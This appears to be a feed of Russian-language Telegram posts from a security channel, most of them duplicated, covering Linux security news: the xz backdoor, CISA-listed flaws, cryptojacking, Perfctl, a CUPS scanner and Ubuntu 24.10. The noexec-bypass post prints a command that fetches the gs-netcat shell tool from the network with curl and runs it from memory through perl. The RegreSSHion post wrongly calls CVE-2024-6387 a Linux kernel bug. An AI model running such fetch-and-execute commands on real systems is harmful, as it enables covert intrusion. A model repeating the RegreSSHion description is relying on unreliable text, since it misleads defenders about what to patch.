🔐🐧 Рубрика: интересные статьи в интерннет
Обзор артефактов Linux для расследования инцидентов кибербезопасности 🔐🐧
🔗 Ссылка на оригинал статьи: Читать здесь
Привет, друзья SecureTechTalks! Сегодня мы хотим поделиться с вами статьей, которая может быть очень полезной для специалистов по информационной безопасности. В ней рассматриваются ключевые артефакты, которые стоит изучить при расследовании инцидентов на Linux.
Статья выделяет 10 важных аспектов, на которые стоит обратить внимание при анализе инфраструктуры. Автор затрагивает такие темы, как журналы аудита, временные файлы, сетевые взаимодействия и многое другое. Каждый инструмент помогает найти ценную информацию для успешного расследования инцидента.
В статье особо подчеркивается важность тщательного анализа артефактов для выявления следов злоумышленных действий. Также предлагаются рекомендации по сбору и интерпретации данных, которые дают возможность максимально эффективно расследовать инцидент.
Чтобы прочитать полную статью, переходите по ссылке выше!
#SecureTechTalks #Кибербезопасность #Linux #РасследованиеИнцидентов
Обзор артефактов Linux для расследования инцидентов кибербезопасности 🔐🐧
🔗 Ссылка на оригинал статьи: Читать здесь
Привет, друзья SecureTechTalks! Сегодня мы хотим поделиться с вами статьей, которая может быть очень полезной для специалистов по информационной безопасности. В ней рассматриваются ключевые артефакты, которые стоит изучить при расследовании инцидентов на Linux.
Статья выделяет 10 важных аспектов, на которые стоит обратить внимание при анализе инфраструктуры. Автор затрагивает такие темы, как журналы аудита, временные файлы, сетевые взаимодействия и многое другое. Каждый инструмент помогает найти ценную информацию для успешного расследования инцидента.
В статье особо подчеркивается важность тщательного анализа артефактов для выявления следов злоумышленных действий. Также предлагаются рекомендации по сбору и интерпретации данных, которые дают возможность максимально эффективно расследовать инцидент.
Чтобы прочитать полную статью, переходите по ссылке выше!
#SecureTechTalks #Кибербезопасность #Linux #РасследованиеИнцидентов
🔒✨ SecureTechTalks: Шифрование Linux✨🔒
Друзья, сегодня мы хотим рассказать про Cryptsetup - невероятно мощной утилиты с открытым исходным кодом! 🚀
Если вы являетесь пользователем Linux, то Cryptsetup станет вашим лучшим другом, предоставляя максимально удобные и гибкие возможности для настройки шифрования диска. 💻🔐
Суперсила Cryptsetup лежит в его способности работать с разнообразными форматами шифрования, включая LUKS, loop-AES, TrueCrypt (и даже расширение VeraCrypt), BitLocker и даже FileVault2! 🗝️🔒
Делитесь вашими впечатлениями от инструмента в комментариях и продолжайте следить за новостями кибербезопасности 🛡️✅
#Cryptsetup #Linux #Приватность
Друзья, сегодня мы хотим рассказать про Cryptsetup - невероятно мощной утилиты с открытым исходным кодом! 🚀
Если вы являетесь пользователем Linux, то Cryptsetup станет вашим лучшим другом, предоставляя максимально удобные и гибкие возможности для настройки шифрования диска. 💻🔐
Суперсила Cryptsetup лежит в его способности работать с разнообразными форматами шифрования, включая LUKS, loop-AES, TrueCrypt (и даже расширение VeraCrypt), BitLocker и даже FileVault2! 🗝️🔒
Делитесь вашими впечатлениями от инструмента в комментариях и продолжайте следить за новостями кибербезопасности 🛡️✅
#Cryptsetup #Linux #Приватность
👍1
🔒💻 Всем привет! Сегодня мы хотим поговорить о подготовке к сертификации RHCSA. Если вы мечтаете о карьере в области кибербезопасности, то получение сертификата Red Hat Certified System Administrator (RHCSA) может стать важным шагом к вашей цели. 🎯
📚 RHCSA является признанным стандартом в Linux-индустрии и обеспечивает необходимые навыки для работы с операционными системами Red Hat Enterprise Linux. Так что, давайте обсудим некоторые полезные ресурсы, которые помогут вам подготовиться к экзамену!
🔍 Первым делом, рекомендуем ознакомиться с официальным учебным планом и материалами от Red Hat. Вы можете найти все необходимые руководства и учебники на их сайте здесь.
💻 Для самостоятельного изучения и практики лучше всего использовать виртуальные машины. Red Hat предоставляет бесплатную версию для личного использования, которую можно скачать здесь.
📚 Кроме того, существуют многочисленные ресурсы от сообщества, которые помогут вам углубить свои знания. Мы рекомендуем ознакомиться с книгой "RHCSA/RHCE Red Hat Linux Certification Study Guide", написанной Michael Jang и Alessandro Orsaria. Она освещает все необходимые аспекты подготовки к экзаменам RHCSA и RHCE.
✅ Готовьтесь и изучайте эти материалы внимательно, а также обращайте внимание на практические навыки. Сэкономьте время и энергию для эффективной подготовки.
⚡️ Получение сертификации RHCSA может стать важным моментом в вашей карьере в кибербезопасности. Не забудьте практиковаться и задавать вопросы. Мы верим в ваш успех! 💪✨
#SecureTechTalks #RHCSA #Linux
📚 RHCSA является признанным стандартом в Linux-индустрии и обеспечивает необходимые навыки для работы с операционными системами Red Hat Enterprise Linux. Так что, давайте обсудим некоторые полезные ресурсы, которые помогут вам подготовиться к экзамену!
🔍 Первым делом, рекомендуем ознакомиться с официальным учебным планом и материалами от Red Hat. Вы можете найти все необходимые руководства и учебники на их сайте здесь.
💻 Для самостоятельного изучения и практики лучше всего использовать виртуальные машины. Red Hat предоставляет бесплатную версию для личного использования, которую можно скачать здесь.
📚 Кроме того, существуют многочисленные ресурсы от сообщества, которые помогут вам углубить свои знания. Мы рекомендуем ознакомиться с книгой "RHCSA/RHCE Red Hat Linux Certification Study Guide", написанной Michael Jang и Alessandro Orsaria. Она освещает все необходимые аспекты подготовки к экзаменам RHCSA и RHCE.
✅ Готовьтесь и изучайте эти материалы внимательно, а также обращайте внимание на практические навыки. Сэкономьте время и энергию для эффективной подготовки.
⚡️ Получение сертификации RHCSA может стать важным моментом в вашей карьере в кибербезопасности. Не забудьте практиковаться и задавать вопросы. Мы верим в ваш успех! 💪✨
#SecureTechTalks #RHCSA #Linux
🛡️🔒 Breaking news: Критическая уязвимость Linux 10 из 10🔒🛡️
🗡 Обнаружен скрытый бэкдор в утилите для сжатия xz, широко используемой в дистрибутивах Linux. Этот бэкдор создает критическую угрозу для безопасности, позволяя злоумышленникам получить несанкционированный доступ к службам SSH.
🛠 Инженер-программист из Microsoft, Андрес Фроунд, обнаружил бэкдор в последней нестабильной версии Debian и сообщил об этом в компанию Openwall. Вредоносные .m4 файлы, добавленные в архивы xz версии 5.6.0, содержали инструкции для модификации библиотеки liblzma, что может привести к компрометации sshd.
🧨 Кроме того, выявлено влияние CVE-2024-3094 на менеджер пакетов HomeBrew для macOS. Red Hat также опубликовал предупреждение о данной уязвимости, призывая пользователей немедленно прекратить использование любых экземпляров Fedora Rawhide.
🎯 Пользователям рекомендуется немедленно откатиться к версии Fedora Linux 40 с использованием xz 5.4 и обратить внимание на обновления безопасности для других дистрибутивов Linux и HomeBrew.
🔐 Будьте бдительны и защищайте свои системы! Stay secure and read SecureTechTalks🛡
#Кибербезопасность
#SecureTechTalks
#Уязвимости
#Linux #Fedora #Debian 🚨
🗡 Обнаружен скрытый бэкдор в утилите для сжатия xz, широко используемой в дистрибутивах Linux. Этот бэкдор создает критическую угрозу для безопасности, позволяя злоумышленникам получить несанкционированный доступ к службам SSH.
🛠 Инженер-программист из Microsoft, Андрес Фроунд, обнаружил бэкдор в последней нестабильной версии Debian и сообщил об этом в компанию Openwall. Вредоносные .m4 файлы, добавленные в архивы xz версии 5.6.0, содержали инструкции для модификации библиотеки liblzma, что может привести к компрометации sshd.
🧨 Кроме того, выявлено влияние CVE-2024-3094 на менеджер пакетов HomeBrew для macOS. Red Hat также опубликовал предупреждение о данной уязвимости, призывая пользователей немедленно прекратить использование любых экземпляров Fedora Rawhide.
🎯 Пользователям рекомендуется немедленно откатиться к версии Fedora Linux 40 с использованием xz 5.4 и обратить внимание на обновления безопасности для других дистрибутивов Linux и HomeBrew.
🔐 Будьте бдительны и защищайте свои системы! Stay secure and read SecureTechTalks🛡
#Кибербезопасность
#SecureTechTalks
#Уязвимости
#Linux #Fedora #Debian 🚨
🛡️ Уязвимости в Linux и продуктах Check Point
Американское агентство CISA добавило уязвимость CVE-2024-1086 в каталог известных эксплуатируемых уязвимостей (KEV). Эта уязвимость связана с компонентом netfilter в ядре Linux и позволяет повышать привилегии до уровня root. Уязвимость оценивается на 7.8 баллов по шкале CVSS и позволяет злоумышленникам выполнять произвольный код.
🖥️ Netfilter - это фреймворк, предоставляемый ядром Linux, который позволяет выполнять различные сетевые операции, например фильтрацию пакетов. Уязвимость была устранена в январе 2024 года, однако методика атак, эксплуатирующих эту уязвимость, до сих пор неизвестна.
🔒 Кроме того, CISA добавило в каталог уязвимость CVE-2024-24919 в продуктах Check Point, которая позволяет злоумышленникам читать конфиденциальную информацию на интернет-шлюзах с включенным VPN или мобильным доступом. Уязвимость имеет оценку 7.5 по шкале CVSS.
💼 В связи с активной эксплуатацией уязвимостей CVE-2024-1086 и CVE-2024-24919, рекомендуется установить последние обновления для защиты от потенциальных угроз.
Stay secure and read SecureTechTalks 📚
#CVE #Уязвимости #Linux
Американское агентство CISA добавило уязвимость CVE-2024-1086 в каталог известных эксплуатируемых уязвимостей (KEV). Эта уязвимость связана с компонентом netfilter в ядре Linux и позволяет повышать привилегии до уровня root. Уязвимость оценивается на 7.8 баллов по шкале CVSS и позволяет злоумышленникам выполнять произвольный код.
🖥️ Netfilter - это фреймворк, предоставляемый ядром Linux, который позволяет выполнять различные сетевые операции, например фильтрацию пакетов. Уязвимость была устранена в январе 2024 года, однако методика атак, эксплуатирующих эту уязвимость, до сих пор неизвестна.
🔒 Кроме того, CISA добавило в каталог уязвимость CVE-2024-24919 в продуктах Check Point, которая позволяет злоумышленникам читать конфиденциальную информацию на интернет-шлюзах с включенным VPN или мобильным доступом. Уязвимость имеет оценку 7.5 по шкале CVSS.
💼 В связи с активной эксплуатацией уязвимостей CVE-2024-1086 и CVE-2024-24919, рекомендуется установить последние обновления для защиты от потенциальных угроз.
Stay secure and read SecureTechTalks 📚
#CVE #Уязвимости #Linux
🔒 Уязвимость RegreSSHion угрожает миллионам Linux-систем 🔒
Новая уязвимость CVE-2024-6387, получившая название RegreSSHion, ставит под угрозу безопасность миллионов Linux-систем.
🐧 Что такое RegreSSHion?
RegreSSHion - это ошибка в управлении памятью в ядре Linux, которая может быть использована злоумышленниками для выполнения произвольного кода. Эта уязвимость получила свое название из-за характера ошибки, связанной с регрессией в коде ядра, введенной в ходе недавнего обновления.
🔍 Эксплуатация уязвимости
Атака на основе уязвимости RegressHion осуществляется через использование специальных эксплойтов, которые позволяют:
1. Получить привилегии суперпользователя (root);
2. Выполнять любой код на уязвимой системе, что открывает возможности для установки вредоносного ПО, кражи данных и других видов злоумышленных действий;
3.Уязвимость может быть использована для быстрого распространения вирусов и других вредоносных программ по сети.
🛡 Как защититься?
1. Обновление систем: Необходимо немедленно обновить ядро Linux до последней версии, где эта уязвимость была исправлена.
2. Мониторинг и реагирование: Внедрение систем мониторинга безопасности для обнаружения попыток эксплуатации уязвимости.
Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Linux #RegressHion #Уязвимость #Облака #SecureTechTalks #Информация #БезопасностьСистем #Обновление #Защита
Новая уязвимость CVE-2024-6387, получившая название RegreSSHion, ставит под угрозу безопасность миллионов Linux-систем.
🐧 Что такое RegreSSHion?
RegreSSHion - это ошибка в управлении памятью в ядре Linux, которая может быть использована злоумышленниками для выполнения произвольного кода. Эта уязвимость получила свое название из-за характера ошибки, связанной с регрессией в коде ядра, введенной в ходе недавнего обновления.
🔍 Эксплуатация уязвимости
Атака на основе уязвимости RegressHion осуществляется через использование специальных эксплойтов, которые позволяют:
1. Получить привилегии суперпользователя (root);
2. Выполнять любой код на уязвимой системе, что открывает возможности для установки вредоносного ПО, кражи данных и других видов злоумышленных действий;
3.Уязвимость может быть использована для быстрого распространения вирусов и других вредоносных программ по сети.
🛡 Как защититься?
1. Обновление систем: Необходимо немедленно обновить ядро Linux до последней версии, где эта уязвимость была исправлена.
2. Мониторинг и реагирование: Внедрение систем мониторинга безопасности для обнаружения попыток эксплуатации уязвимости.
Stay secure and read SecureTechTalks 📚
#Кибербезопасность #Linux #RegressHion #Уязвимость #Облака #SecureTechTalks #Информация #БезопасностьСистем #Обновление #Защита
🔍 PostgreSQL: как криптоджекинг угрожает безопасности баз данных
Плохо защищённые PostgreSQL базы данных, работающие на Linux-серверах, становятся мишенями для криптоджекинг-атак. Исследователи из Aqua Security обнаружили эту угрозу, наблюдая за работой хакеров на системе-ловушке (honeypot).
⚠️ Как происходит атака?
Киберпреступники начинают с брутфорсинга учетных данных для доступа к базе данных. После успешного взлома они:
1. Создают новую роль пользователя с возможностью входа и повышенными привилегиями.
2. Лишают скомпрометированную учетку прав суперпользователя, чтобы ограничить доступ другим возможным злоумышленникам.
3. Начинают сбор информации о системе.
4. Выполняют команды оболочки для загрузки двух файлов на систему.
🔧 Вредоносные файлы
Первый файл — PG_Core — нацелен на удаление cron-заданий для текущего пользователя и остановку процессов, связанных с другим криптомайнинговым ПО (например, Kinsing, WatchDog, TeamTNT). Злоумышленник также удаляет файлы и логи, чтобы скрыть следы атаки.
Второй файл — PG_Mem — представляет собой дроппер для Linux, содержащий криптомайнер XMRIG, который затем сохраняется и запускается на системе.
🌐 Широкий спектр потенциальных целей
PostgreSQL — широко используемая система управления реляционными базами данных с открытым исходным кодом. Она часто развёртывается в облаке, в средах Kubernetes и на локальных серверах организаций. По данным Shodan, в настоящее время более 830 000 PostgreSQL баз данных доступны из Интернета, что делает их привлекательными целями для криптоджекинг-групп и вымогателей.
🛡️ Как защитить PostgreSQL от криптоджекинга?
- Избегайте прямого доступа к PostgreSQL через Интернет: Используйте VPN, SSH-туннели или обратные прокси для безопасного доступа.
- Настройте сетевую безопасность: Ограничьте доступ к базе данных с помощью брандмауэров.
- Применяйте сильные пароли: Все пользователи должны иметь уникальные и сложные пароли.
- Включите журналы аудита и системы обнаружения вторжений.
- Отключайте ненужные функции и защищайте приложения от SQL-инъекций.
🔗 Дополнительные меры защиты PostgreSQL от криптоджекинга описаны тут.
Stay secure and read SecureTechTalks 📚
#PostgreSQL #Криптоджекинг #Кибербезопасность #SecureTechTalks #ИнформационнаяБезопасность #БазыДанных #Linux
Плохо защищённые PostgreSQL базы данных, работающие на Linux-серверах, становятся мишенями для криптоджекинг-атак. Исследователи из Aqua Security обнаружили эту угрозу, наблюдая за работой хакеров на системе-ловушке (honeypot).
⚠️ Как происходит атака?
Киберпреступники начинают с брутфорсинга учетных данных для доступа к базе данных. После успешного взлома они:
1. Создают новую роль пользователя с возможностью входа и повышенными привилегиями.
2. Лишают скомпрометированную учетку прав суперпользователя, чтобы ограничить доступ другим возможным злоумышленникам.
3. Начинают сбор информации о системе.
4. Выполняют команды оболочки для загрузки двух файлов на систему.
🔧 Вредоносные файлы
Первый файл — PG_Core — нацелен на удаление cron-заданий для текущего пользователя и остановку процессов, связанных с другим криптомайнинговым ПО (например, Kinsing, WatchDog, TeamTNT). Злоумышленник также удаляет файлы и логи, чтобы скрыть следы атаки.
Второй файл — PG_Mem — представляет собой дроппер для Linux, содержащий криптомайнер XMRIG, который затем сохраняется и запускается на системе.
🌐 Широкий спектр потенциальных целей
PostgreSQL — широко используемая система управления реляционными базами данных с открытым исходным кодом. Она часто развёртывается в облаке, в средах Kubernetes и на локальных серверах организаций. По данным Shodan, в настоящее время более 830 000 PostgreSQL баз данных доступны из Интернета, что делает их привлекательными целями для криптоджекинг-групп и вымогателей.
🛡️ Как защитить PostgreSQL от криптоджекинга?
- Избегайте прямого доступа к PostgreSQL через Интернет: Используйте VPN, SSH-туннели или обратные прокси для безопасного доступа.
- Настройте сетевую безопасность: Ограничьте доступ к базе данных с помощью брандмауэров.
- Применяйте сильные пароли: Все пользователи должны иметь уникальные и сложные пароли.
- Включите журналы аудита и системы обнаружения вторжений.
- Отключайте ненужные функции и защищайте приложения от SQL-инъекций.
🔗 Дополнительные меры защиты PostgreSQL от криптоджекинга описаны тут.
Stay secure and read SecureTechTalks 📚
#PostgreSQL #Криптоджекинг #Кибербезопасность #SecureTechTalks #ИнформационнаяБезопасность #БазыДанных #Linux
💻 Масштабная атака на Linux: криптомайнер "Perfctl" 💻
Исследователи из Aqua Security обнаружили новую волну атак на Linux-системы с использованием скрытного вредоносного ПО под названием "Perfctl". ПО заражает тысячи систем, заставляя их работать на майнинг криптовалюты Monero (через XMRIG), а в некоторых случаях также используется для proxy-jacking.
🔍 Что такое "Perfctl"? Название вируса происходит от названия процесса, созданного на заражённых системах. "Perf" указывает на стандартный инструмент мониторинга производительности в Linux, а "ctl" подразумевает управление в командной строке. Это делает вредоносный процесс менее заметным для администраторов при поверхностной проверке.
🚨 Хакеры используют известные уязвимости, например CVE-2021-4034 (PwnKit), и ошибки конфигурации, чтобы установить вирус. Он копирует себя в несколько системных директорий, изменяет скрипты для сокрытия своей активности, устанавливает руткиты для обеспечения скрытности и перехвата сетевого трафика, а также запускает XMRIG для майнинга.
📉 Одной из ключевых особенностей Perfctl является его способность "прятаться". Он временно останавливает все майнинговые процессы, как только новый пользователь входит в систему, что затрудняет его обнаружение.
🔧 Чтобы выявить Perfctl, необходимо проверять системные процессы, журналы и сетевой трафик. Aqua Security поделились индикаторами компрометации и советами по устранению угрозы.
🛡️ Если ваша система используется для криптомайнинга без вашего ведома, это не просто вопрос производительности. Вредоносное ПО может служить бэкдором для установки других вирусов, что ставит под угрозу всю инфраструктуру.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #Linux #SecureTechTalks #cryptomining #Perfctl #информационнаябезопасность
Исследователи из Aqua Security обнаружили новую волну атак на Linux-системы с использованием скрытного вредоносного ПО под названием "Perfctl". ПО заражает тысячи систем, заставляя их работать на майнинг криптовалюты Monero (через XMRIG), а в некоторых случаях также используется для proxy-jacking.
🔍 Что такое "Perfctl"? Название вируса происходит от названия процесса, созданного на заражённых системах. "Perf" указывает на стандартный инструмент мониторинга производительности в Linux, а "ctl" подразумевает управление в командной строке. Это делает вредоносный процесс менее заметным для администраторов при поверхностной проверке.
🚨 Хакеры используют известные уязвимости, например CVE-2021-4034 (PwnKit), и ошибки конфигурации, чтобы установить вирус. Он копирует себя в несколько системных директорий, изменяет скрипты для сокрытия своей активности, устанавливает руткиты для обеспечения скрытности и перехвата сетевого трафика, а также запускает XMRIG для майнинга.
📉 Одной из ключевых особенностей Perfctl является его способность "прятаться". Он временно останавливает все майнинговые процессы, как только новый пользователь входит в систему, что затрудняет его обнаружение.
🔧 Чтобы выявить Perfctl, необходимо проверять системные процессы, журналы и сетевой трафик. Aqua Security поделились индикаторами компрометации и советами по устранению угрозы.
🛡️ Если ваша система используется для криптомайнинга без вашего ведома, это не просто вопрос производительности. Вредоносное ПО может служить бэкдором для установки других вирусов, что ставит под угрозу всю инфраструктуру.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #Linux #SecureTechTalks #cryptomining #Perfctl #информационнаябезопасность
❤1
🛡️ Оперативно находим уязвимые для RCE и DDoS сервера
Исследователь кибербезопасности Маркус Хитчинс представил автоматизированный сканер для поиска уязвимых серверов на Linux и UNIX, которые могут быть атакованы через уязвимость CUPS (CVE-2024-47176). Инструмент упрощает задачу системных администраторов по обнаружению устройств с активированной службой cups-browsed, которая подвержена риску удалённого выполнения кода (RCE).
🔍 Уязвимость впервые была выявлена исследователем безопасности Симоне Маргарителли и получила внимание в прошлом месяце. Несмотря на то, что риск эксплуатации RCE в реальной среде оценивается как ограниченный, специалисты из Akamai отметили, что уязвимость может использоваться для усиления DDoS-атак.
⚙️ Суть проблемы:
Служба cups-browsed открывает порт управления (UDP 631) для любого сетевого интерфейса, что делает его доступным для всех систем в сети. Без должной аутентификации злоумышленники могут отправлять команды через данный порт.
🔧 Как работает сканер? Сканер, разработанный Хитчинсом, написан на Python и сканирует локальные сети, помогая выявлять устройства с уязвимыми версиями CUPS. Даже если порт защищён снаружи брандмауэром, он может быть доступен внутри сети, что создаёт риск для повышения привилегий и бокового перемещения.
📊 Результаты сохраняются в двух логах: первый включает IP-адреса и версии CUPS уязвимых устройств, второй — информацию об отправленных HTTP-запросах для дальнейшего анализа.
🛠 Использование сканера может помочь системным администраторам оперативно планировать патчинг и снижать риски эксплуатации уязвимости CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #CVE2024 #Linux #информационнаябезопасность #CUPS
Исследователь кибербезопасности Маркус Хитчинс представил автоматизированный сканер для поиска уязвимых серверов на Linux и UNIX, которые могут быть атакованы через уязвимость CUPS (CVE-2024-47176). Инструмент упрощает задачу системных администраторов по обнаружению устройств с активированной службой cups-browsed, которая подвержена риску удалённого выполнения кода (RCE).
🔍 Уязвимость впервые была выявлена исследователем безопасности Симоне Маргарителли и получила внимание в прошлом месяце. Несмотря на то, что риск эксплуатации RCE в реальной среде оценивается как ограниченный, специалисты из Akamai отметили, что уязвимость может использоваться для усиления DDoS-атак.
⚙️ Суть проблемы:
Служба cups-browsed открывает порт управления (UDP 631) для любого сетевого интерфейса, что делает его доступным для всех систем в сети. Без должной аутентификации злоумышленники могут отправлять команды через данный порт.
🔧 Как работает сканер? Сканер, разработанный Хитчинсом, написан на Python и сканирует локальные сети, помогая выявлять устройства с уязвимыми версиями CUPS. Даже если порт защищён снаружи брандмауэром, он может быть доступен внутри сети, что создаёт риск для повышения привилегий и бокового перемещения.
📊 Результаты сохраняются в двух логах: первый включает IP-адреса и версии CUPS уязвимых устройств, второй — информацию об отправленных HTTP-запросах для дальнейшего анализа.
🛠 Использование сканера может помочь системным администраторам оперативно планировать патчинг и снижать риски эксплуатации уязвимости CVE-2024-47176.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #CVE2024 #Linux #информационнаябезопасность #CUPS
❤1
🛡️ Ubuntu 24.10 Oracular Oriole: новые меры безопасности и улучшения 🛡️
Canonical выпустила версию Ubuntu 24.10 Oracular Oriole, которая включает обновлённое ядро, новые инструменты для разработчиков и обновление GNOME 47. Одним из ключевых нововведений стали расширенные меры безопасности.
📌 Усиленные меры безопасности
Одним из главных нововведений стал экспериментальный функционал для контроля прав доступа. Теперь пользователи могут детально управлять разрешениями приложений, используя систему AppArmor. Решение обеспечивает контроль над доступом приложений к системным ресурсам, требуя явного разрешения от пользователя выполнения определённых действий.
Функционал можно активировать через Security Center в Ubuntu 24.10, который будет постепенно расширяться новыми опциями для управления файерволом и шифрованием.
💻 Поддержка расширенных инструментов для разработки
В новой версии Ubuntu представлена поддержка последних версий Python, Java, Go, C++, Rust, а также .Net, который теперь доступен на архитектуре ppc64el. Разработчики могут выбирать нужные версии инструментов, включая версии Rust, доступные в архиве.
Java-пакеты OpenJDK 17 и OpenJDK 21 получили сертификацию TCK, что гарантирует соответствие спецификациям Java SE.
🔑 Valkey — новый инструмент для работы с данными
В Ubuntu 24.10 интегрирован Valkey — высокопроизводительное хранилище key/value с открытым исходным кодом. Инструмент подходит для различных задач, в том числе для кэширования запросов и управление очередями.
💡 Новые возможности с GNOME 47
Новая версия GNOME 47 предлагает улучшенную производительность и стабильность. Wayland теперь используется по умолчанию для систем с NVIDIA, а обновления через Snap стали более прозрачными благодаря уведомлениям в App Center и Ubuntu Dock.
🔗 Детали обновления можно прочитать в release notes. Ссылка для скачивания дистрибутива тут.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Ubuntu #Linux #информационнаябезопасность #GNOME
Canonical выпустила версию Ubuntu 24.10 Oracular Oriole, которая включает обновлённое ядро, новые инструменты для разработчиков и обновление GNOME 47. Одним из ключевых нововведений стали расширенные меры безопасности.
📌 Усиленные меры безопасности
Одним из главных нововведений стал экспериментальный функционал для контроля прав доступа. Теперь пользователи могут детально управлять разрешениями приложений, используя систему AppArmor. Решение обеспечивает контроль над доступом приложений к системным ресурсам, требуя явного разрешения от пользователя выполнения определённых действий.
Функционал можно активировать через Security Center в Ubuntu 24.10, который будет постепенно расширяться новыми опциями для управления файерволом и шифрованием.
💻 Поддержка расширенных инструментов для разработки
В новой версии Ubuntu представлена поддержка последних версий Python, Java, Go, C++, Rust, а также .Net, который теперь доступен на архитектуре ppc64el. Разработчики могут выбирать нужные версии инструментов, включая версии Rust, доступные в архиве.
Java-пакеты OpenJDK 17 и OpenJDK 21 получили сертификацию TCK, что гарантирует соответствие спецификациям Java SE.
🔑 Valkey — новый инструмент для работы с данными
В Ubuntu 24.10 интегрирован Valkey — высокопроизводительное хранилище key/value с открытым исходным кодом. Инструмент подходит для различных задач, в том числе для кэширования запросов и управление очередями.
💡 Новые возможности с GNOME 47
Новая версия GNOME 47 предлагает улучшенную производительность и стабильность. Wayland теперь используется по умолчанию для систем с NVIDIA, а обновления через Snap стали более прозрачными благодаря уведомлениям в App Center и Ubuntu Dock.
🔗 Детали обновления можно прочитать в release notes. Ссылка для скачивания дистрибутива тут.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Ubuntu #Linux #информационнаябезопасность #GNOME
❤1👍1
⚠️ Обход флага noexec в Linux: критическая уязвимость ⚠️
Исследователи обнаружили способ обхода флага noexec в Linux, который позволяет запускать произвольные бинарные файлы на разделах, где выполнение запрещено. Этот метод использует скрипты на Perl, Bash и PHP, не требуя прав root, и позволяет загружать и исполнять файлы напрямую из интернета, обходя ограничения.
🔑 Как работает уязвимость?
Секрет заключается в том, что бинарный файл не нужно помечать как исполняемый, и он может находиться на разделе с активным флагом noexec. Это особенно критично, если все доступные для записи разделы смонтированы с параметром -o noexec, включая /dev/shm. Метод работает даже в средах, где PHP ограничен в использовании функции 'exec'.
💻 Технические детали
Решение базируется на инъекции shellcode в работающий процесс через системные вызовы memfd_create и execveat, что позволяет загрузить бинарный файл из оперативной памяти. Метод успешно работает даже в условиях, когда системные вызовы в Bash и PHP заблокированы.
Пример выполнения команды 'id' на Perl:
Аналогично для Bash:
📡 Загрузка и исполнение файлов из интернета
Одним из опасных аспектов метода является возможность загрузки и выполнения файлов напрямую из сети, минуя ограничения noexec. Это может использоваться злоумышленниками для скрытого запуска вредоносного ПО, например:
🚨 Влияние на безопасность
Метод представляет серьёзную угрозу для систем, которые полагаются на флаг noexec для защиты от исполнения кода. Специалисты рекомендуют усилить контроль за доступом к системным вызовам и ограничить их использование, особенно в критически важных средах.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Linux #noexec #уязвимость #информационнаябезопасность
Исследователи обнаружили способ обхода флага noexec в Linux, который позволяет запускать произвольные бинарные файлы на разделах, где выполнение запрещено. Этот метод использует скрипты на Perl, Bash и PHP, не требуя прав root, и позволяет загружать и исполнять файлы напрямую из интернета, обходя ограничения.
🔑 Как работает уязвимость?
Секрет заключается в том, что бинарный файл не нужно помечать как исполняемый, и он может находиться на разделе с активным флагом noexec. Это особенно критично, если все доступные для записи разделы смонтированы с параметром -o noexec, включая /dev/shm. Метод работает даже в средах, где PHP ограничен в использовании функции 'exec'.
💻 Технические детали
Решение базируется на инъекции shellcode в работающий процесс через системные вызовы memfd_create и execveat, что позволяет загрузить бинарный файл из оперативной памяти. Метод успешно работает даже в условиях, когда системные вызовы в Bash и PHP заблокированы.
Пример выполнения команды 'id' на Perl:
source memexec-perl.sh
cat /usr/bin/id | memexec -u
Аналогично для Bash:
source memexec-bash.sh
cat /usr/bin/id | memexec
📡 Загрузка и исполнение файлов из интернета
Одним из опасных аспектов метода является возможность загрузки и выполнения файлов напрямую из сети, минуя ограничения noexec. Это может использоваться злоумышленниками для скрытого запуска вредоносного ПО, например:
curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | perl -e 'for(319,279){...}'🚨 Влияние на безопасность
Метод представляет серьёзную угрозу для систем, которые полагаются на флаг noexec для защиты от исполнения кода. Специалисты рекомендуют усилить контроль за доступом к системным вызовам и ограничить их использование, особенно в критически важных средах.
Stay secure and read SecureTechTalks 📚
#кибербезопасность #SecureTechTalks #Linux #noexec #уязвимость #информационнаябезопасность
🇷🇺 Суверенное Linux-сообщество: новая инициатива Минцифры
📢 Минцифры РФ предложило создать национальное Linux-сообщество после того, как из международного Linux-комьюнити были исключены 11 российских мейнтейнеров по причине обвинений в «троллинге». Теперь министерство планирует организовать команду, которая объединила бы разработчиков из России и дружественных стран.
📈 Зачем это нужно?
Новый проект может стать шагом к усилению технологической независимости России и поддержанию компетенций в разработке открытого ПО. Российские специалисты видят в этом шанс сохранить и развивать навыки, несмотря на международные ограничения.
⚙️ Возможные трудности Создание отдельной ветки Linux потребует серьёзных ресурсов и вложений. По мнению экспертов, чтобы достичь успеха, России необходимо взять на себя ведущую роль и привлекать к участию другие страны, такие как Китай, который также стремится к независимым разработкам.
🔗 Опыт RISC-V
В 2022 году Россия уже создала суверенный альянс разработчиков архитектуры RISC-V, что может послужить полезным опытом в формировании нового Linux-сообщества и укреплении независимости в ИТ.
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #Linux #технологическаянезависимость #Минцифры #кибербезопасность
📢 Минцифры РФ предложило создать национальное Linux-сообщество после того, как из международного Linux-комьюнити были исключены 11 российских мейнтейнеров по причине обвинений в «троллинге». Теперь министерство планирует организовать команду, которая объединила бы разработчиков из России и дружественных стран.
📈 Зачем это нужно?
Новый проект может стать шагом к усилению технологической независимости России и поддержанию компетенций в разработке открытого ПО. Российские специалисты видят в этом шанс сохранить и развивать навыки, несмотря на международные ограничения.
⚙️ Возможные трудности Создание отдельной ветки Linux потребует серьёзных ресурсов и вложений. По мнению экспертов, чтобы достичь успеха, России необходимо взять на себя ведущую роль и привлекать к участию другие страны, такие как Китай, который также стремится к независимым разработкам.
🔗 Опыт RISC-V
В 2022 году Россия уже создала суверенный альянс разработчиков архитектуры RISC-V, что может послужить полезным опытом в формировании нового Linux-сообщества и укреплении независимости в ИТ.
Stay secure and read SecureTechTalks 📚
#SecureTechTalks #Linux #технологическаянезависимость #Минцифры #кибербезопасность
👍1